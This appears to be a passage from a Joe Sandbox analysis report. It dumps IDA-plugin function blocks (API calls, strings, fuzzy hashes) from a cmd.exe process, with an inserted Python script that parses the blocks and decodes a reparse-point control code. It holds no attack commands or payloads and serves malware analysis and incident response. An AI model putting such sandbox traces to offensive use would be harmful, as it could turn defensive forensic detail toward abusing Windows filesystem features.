                                                                                        • Instruction Fuzzy Hash: C3C1C6729002259BDB24DFA4DC45AEE77B9EB88300F1481AAE90DE7250EB31DD85CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D74F03
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00D74F67
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00D74F77
                                                                                        • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D62670,?,?,?,-00000001), ref: 00D74FEB
                                                                                        • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00D75103
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00D7511E
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D75141
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstmemset$Next
                                                                                        • String ID: \\?\
                                                                                        • API String ID: 3059144641-4282027825
                                                                                        • Opcode ID: d27bf1bde429a9c123cdc65570c260651613339e3cedea828833a6e065a9c53b
                                                                                        • Instruction ID: 5043786feaa7cb36d826b541486e2f610c0d90abf5d2a5dcf60758237058dffc
                                                                                        • Opcode Fuzzy Hash: d27bf1bde429a9c123cdc65570c260651613339e3cedea828833a6e065a9c53b
                                                                                        • Instruction Fuzzy Hash: 89E10371A002098BDB24EB68DC85BBA77B8EF54300F4844A9E90DD7285F771DE85CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 00D6539C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: c824324113123766fc2c95c600ee2bdb7392c904aad9bcd8b02b14ee446d6792
                                                                                        • Instruction ID: 8efe58255551b4248db52b8c8581c88f14081f3a3359c0531c5111a0e40e97e2
                                                                                        • Opcode Fuzzy Hash: c824324113123766fc2c95c600ee2bdb7392c904aad9bcd8b02b14ee446d6792
                                                                                        • Instruction Fuzzy Hash: 4AA103729002168BCB249F78C8956BEF3B5EF54310F5885ADE94AD7284FB319E81CB34
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(335C4BB4,00000000,?), ref: 00D87710
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87722
                                                                                          • Part of subcall function 00D6EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00D8E590,00002000,?,00DA8BF0,00000000,?,?,00D68F0D), ref: 00D6EC51
                                                                                        • towupper.MSVCRT ref: 00D878BC
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00D879F1
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00D61F8C,00D63B98), ref: 00D87B15
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,335C4BB4,00000000,?), ref: 00D87D0D
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87D20
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                        • String ID: %s $%s>$PROMPT$Unknown
                                                                                        • API String ID: 708651206-3050974680
                                                                                        • Opcode ID: 324940bd99057a43cbb032e89cbb3b32e459669f6fe06f1ce7a9f751c0c3070e
                                                                                        • Instruction ID: e507e7f93f0af62419d8efb85b2b36d1fbcda7bf5911f7423c3a0996fe85584d
                                                                                        • Opcode Fuzzy Hash: 324940bd99057a43cbb032e89cbb3b32e459669f6fe06f1ce7a9f751c0c3070e
                                                                                        • Instruction Fuzzy Hash: DB02E6799052159BCB24EF28CC49ABAB7B5EF45700F28819AE409E7354EB309E81DF74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D8C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00D8C14E
                                                                                          • Part of subcall function 00D8C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 00D8C16A
                                                                                          • Part of subcall function 00D8C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 00D8C17B
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 00D8C24F
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00D8C270
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00D8C293
                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00D8C2AE
                                                                                        • memset.MSVCRT ref: 00D8C2EF
                                                                                        • memcpy.MSVCRT ref: 00D8C324
                                                                                        • memcpy.MSVCRT ref: 00D8C370
                                                                                        • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 00D8C392
                                                                                        • RtlNtStatusToDosError.NTDLL ref: 00D8C39D
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D8C3A4
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00D8C3B6
                                                                                        • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 00D8C3D1
                                                                                        • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8C3E2
                                                                                          • Part of subcall function 00D8C5F2: memset.MSVCRT ref: 00D8C62E
                                                                                          • Part of subcall function 00D8C5F2: memset.MSVCRT ref: 00D8C656
                                                                                          • Part of subcall function 00D8C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00D8C6C7
                                                                                          • Part of subcall function 00D8C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00D8C6E6
                                                                                          • Part of subcall function 00D8C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00D8C72A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                        • String ID:
                                                                                        • API String ID: 223857506-0
                                                                                        • Opcode ID: 8df7f1cd3d6c8f0b99a2248c84dfe83934c125698aaf4baac4997afc271d482f
                                                                                        • Instruction ID: 86e0155c5a754522eb7536463349071a2aafcf5db91781ed88cdeef5275945b1
                                                                                        • Opcode Fuzzy Hash: 8df7f1cd3d6c8f0b99a2248c84dfe83934c125698aaf4baac4997afc271d482f
                                                                                        • Instruction Fuzzy Hash: 98519E71A10204EFDB15AFB8DC49ABEB7B8EF48704B14856AF806E6251E774DD02CB74
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
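The function blocks in this report are raw output of the Joe Sandbox IDA plugin: per-function API call lists with their `ref:` addresses, the `API ID` / `String ID` summary keys, and opcode and instruction fuzzy hashes. The block directly above is the one a responder will want to find quickly, because its `NtFsControlFile` call carries control code `000900A4`. The Python below is an added example, not part of the report and not Joe Sandbox code: it parses blocks in this text layout into records, strips the `Download File` link text that the page fuses onto the associated dump names, lists which block issues `NtFsControlFile` and with which code, and splits that code with the Windows `CTL_CODE` field layout. The sample input is an excerpt of two blocks copied from this page (the second deliberately cut off before its score line, as the last block on this page is); the rule that a record ends at its `Uniqueness Score` line, the field names, and the small FSCTL name table are my assumptions, not a documented format.

```python
"""Parse the Joe Sandbox IDA-plugin function blocks shown in this report into
records and query them.  Added example, not Joe Sandbox code; the layout rule
(a record ends at its 'Uniqueness Score' line) is assumed from the page text."""
import re

# Constructed input: two blocks copied from this report (process 15, cmd.exe code at
# image base 00D60000); the second is cut off before its score line, as on the page.
SAMPLE = r"""APIs
• memset.MSVCRT ref: 00D694F1
  • Part of subcall function 00D71D90: _wcsnicmp.MSVCRT ref: 00D71E14
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 00D695B8
• CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00D69602
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
• API String ID: 1449572041-3461277227
• Instruction Fuzzy Hash: 77C17D71A003149FDB249FA4CC55BAAB7B8EF45714F1480AAF64AD7290EB708D84CF72
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D8C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 00D8C14E
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 00D8C270
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 00D8C293
• NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 00D8C392
• RtlNtStatusToDosError.NTDLL ref: 00D8C39D
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8C3E2
• String ID:
• API String ID: 223857506-0
• Instruction Fuzzy Hash: 98519E71A10204EFDB15AFB8DC49ABEB7B8EF48704B14856AF806E6251E774DD02CB74
"""

API_RE = re.compile(  # "• Name.MODULE(args), ref: ADDR", optionally prefixed by a subcall note
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<name>\S+?)\."
    r"(?P<module>[A-Za-z0-9_\-]+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*?)\s*$")
SCORE_RE = re.compile(r"^\s*Uniqueness Score:\s*(?P<score>-?[\d.]+)%")
FSCTL_NAMES = {0x000900A4: "FSCTL_SET_REPARSE_POINT", 0x000900A8: "FSCTL_GET_REPARSE_POINT",
               0x000900AC: "FSCTL_DELETE_REPARSE_POINT"}  # device 9, METHOD_BUFFERED, FILE_ANY_ACCESS

def parse_api_line(line):
    """One API bullet -> dict, or None when the line is not an API call."""
    m = API_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args.split(",") if args else [], "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None}

def parse_blocks(text):
    """Split report text into one record per function block."""
    records, cur = [], {"apis": [], "associated": []}
    for line in text.splitlines():
        api = parse_api_line(line)
        if api:
            cur["apis"].append(api)
        elif (m := SCORE_RE.match(line)):      # the score line closes a block
            cur["uniqueness_score"] = float(m.group("score"))
            records.append(cur)
            cur = {"apis": [], "associated": []}
        elif (m := KV_RE.match(line)):          # headers such as "APIs"/"Similarity" fall through
            key, val = m.group("key"), m.group("val")
            if key == "Associated":             # drop the download-link text fused to the name
                cur["associated"].append(val.removesuffix("Download File"))
            elif key == "API String ID":
                cur["api_string_id"] = tuple(int(x) for x in val.split("-", 1))
            elif key == "String ID":            # '$'-separated; strings containing '$' are ambiguous
                cur["strings"] = [s for s in val.split("$") if s]
            else:
                cur[key.lower().replace(" ", "_")] = val
    if cur["apis"]:                             # keep a trailing block cut off before its score
        records.append(cur)
    return records

def decode_ctl_code(code):
    """Fields of a Windows I/O control code per the CTL_CODE macro:
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method."""
    return {"device": code >> 16, "access": (code >> 14) & 3,
            "function": (code >> 2) & 0xFFF, "method": code & 3}

def fsctl_codes(records):
    """(instruction fuzzy hash, ref, code, name) per NtFsControlFile call whose FsControlCode (6th arg) was recovered."""
    out = []
    for rec in records:
        for c in rec["apis"]:
            if c["name"] == "NtFsControlFile" and len(c["args"]) > 5 and c["args"][5] != "?":
                code = int(c["args"][5], 16)
                out.append((rec.get("instruction_fuzzy_hash"), c["ref"], code, FSCTL_NAMES.get(code, "unknown")))
    return out

if __name__ == "__main__":
    for h, ref, code, name in fsctl_codes(parse_blocks(SAMPLE)):
        print(f"{h} @ {ref:08X}: 0x{code:08X} {name} {decode_ctl_code(code)}")
```

Arguments the sandbox could not resolve are logged as `?` and are kept as-is; only a concrete FsControlCode is decoded. Feed `parse_blocks` the copied text of a whole report section to get every block's instruction fuzzy hash keyed by the APIs it calls, which is the usual starting point for matching a function against other dumps.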

                                                                                        APIs
                                                                                        • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00D8E590,?,00002000), ref: 00D69342
                                                                                        • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D69356
                                                                                        • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D6936A
                                                                                        • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D6937E
                                                                                        • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 00D7BC07
                                                                                        • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 00D7BD31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                        • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                        • API String ID: 55602301-2516506544
                                                                                        • Opcode ID: 77d9ece82c847551d6e4d73ae0e45b78238c9efc9be91613c9a4cb0000a5b589
                                                                                        • Instruction ID: 38d5442455860a869fb36c5a06fdc8c2e92444cc119d890a7e33d17829875aa1
                                                                                        • Opcode Fuzzy Hash: 77d9ece82c847551d6e4d73ae0e45b78238c9efc9be91613c9a4cb0000a5b589
                                                                                        • Instruction Fuzzy Hash: 4E8183769002199BCF259F648C54BFAB3B9EB44710F5881ABE84ED7250FB319E85CB70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?), ref: 00D758BB
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D758CD
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D75944
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D7594B
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D7596C
                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D75973
                                                                                        • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D7598F
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D759B6
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D8160B
                                                                                        • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00D759D0,?,00D66054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00D81618
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3609286125-0
                                                                                        • Opcode ID: 399e5d22faff4beaf415f71c9e40790ab7ef13e66d8403f6ce520400dc0ffeb6
                                                                                        • Instruction ID: 62348745d060a4be48a8ba8a7d43e62907e01ae3a1ea690d05c2ff7681b0705e
                                                                                        • Opcode Fuzzy Hash: 399e5d22faff4beaf415f71c9e40790ab7ef13e66d8403f6ce520400dc0ffeb6
                                                                                        • Instruction Fuzzy Hash: 2E319031201700EFDB549F68EC09B6A3BA5EB45325F248619E69AC33E4E7759801DF72
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00D74782
                                                                                        • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 00D747D4
                                                                                        • RtlReleaseRelativeName.NTDLL(?), ref: 00D747E0
                                                                                        • RtlFreeUnicodeString.NTDLL(?), ref: 00D747EA
                                                                                          • Part of subcall function 00D74823: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 00D7484F
                                                                                        • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 00D7480E
                                                                                        • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000001), ref: 00D8096F
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8097D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                        • String ID: @
                                                                                        • API String ID: 2968197161-2766056989
                                                                                        • Opcode ID: 7d2d1519fb1936588b43fb821b3322b48efdc91b7ceb7a2c5828091f2dc64b6e
                                                                                        • Instruction ID: f30693a0160a6c500be06edcf18fb3dfb2c00dac29da5c8f8dc4b54079e28de0
                                                                                        • Opcode Fuzzy Hash: 7d2d1519fb1936588b43fb821b3322b48efdc91b7ceb7a2c5828091f2dc64b6e
                                                                                        • Instruction Fuzzy Hash: C8216071E00209AFDB11EFA9D848AEEBBB8EB49750F144126E916F3251E7709E05CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87483
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D87495
                                                                                        • fprintf.MSVCRT ref: 00D874BB
                                                                                        • fflush.MSVCRT ref: 00D874C9
                                                                                        • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D874E2
                                                                                        • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 00D874F8
                                                                                        • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D874FF
                                                                                        • _get_osfhandle.MSVCRT ref: 00D8751C
                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D87524
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3139166086-0
                                                                                        • Opcode ID: db9c6def61a4fb12e1b6330e1bc41a48b3a28a79c03ec378c9628d5604d4f371
                                                                                        • Instruction ID: 76d92db29072faa5a9e1ee3e7b7e8440f3450a80578900a6e992351f8021a640
                                                                                        • Opcode Fuzzy Hash: db9c6def61a4fb12e1b6330e1bc41a48b3a28a79c03ec378c9628d5604d4f371
                                                                                        • Instruction Fuzzy Hash: DA11B230108300BFDB517B68EC0EB7A3B28EB06755F184619F505D52A2EBB9C955CB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                        • API String ID: 0-3532704233
                                                                                        • Opcode ID: 90c677e59c5559e9f850e4514adec9aa1f6569050922916e1d6bb37bf889bb10
                                                                                        • Instruction ID: c8d3c772d85e6452862d63ea8b755667038e3041e7222851ddc8a0087b49ce82
                                                                                        • Opcode Fuzzy Hash: 90c677e59c5559e9f850e4514adec9aa1f6569050922916e1d6bb37bf889bb10
                                                                                        • Instruction Fuzzy Hash: 81B18D715083519FC721DF24C480A6FBBE8BF89718F09496EF99ADB240D770D948CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D71D90: _wcsnicmp.MSVCRT ref: 00D71E14
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                          • Part of subcall function 00D74BAF: _wcsnicmp.MSVCRT ref: 00D74C1A
                                                                                          • Part of subcall function 00D74BAF: _wcsnicmp.MSVCRT ref: 00D80B39
                                                                                        • memset.MSVCRT ref: 00D74975
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00D74ABC
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D74AF4
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D74AFF
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D74B28
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
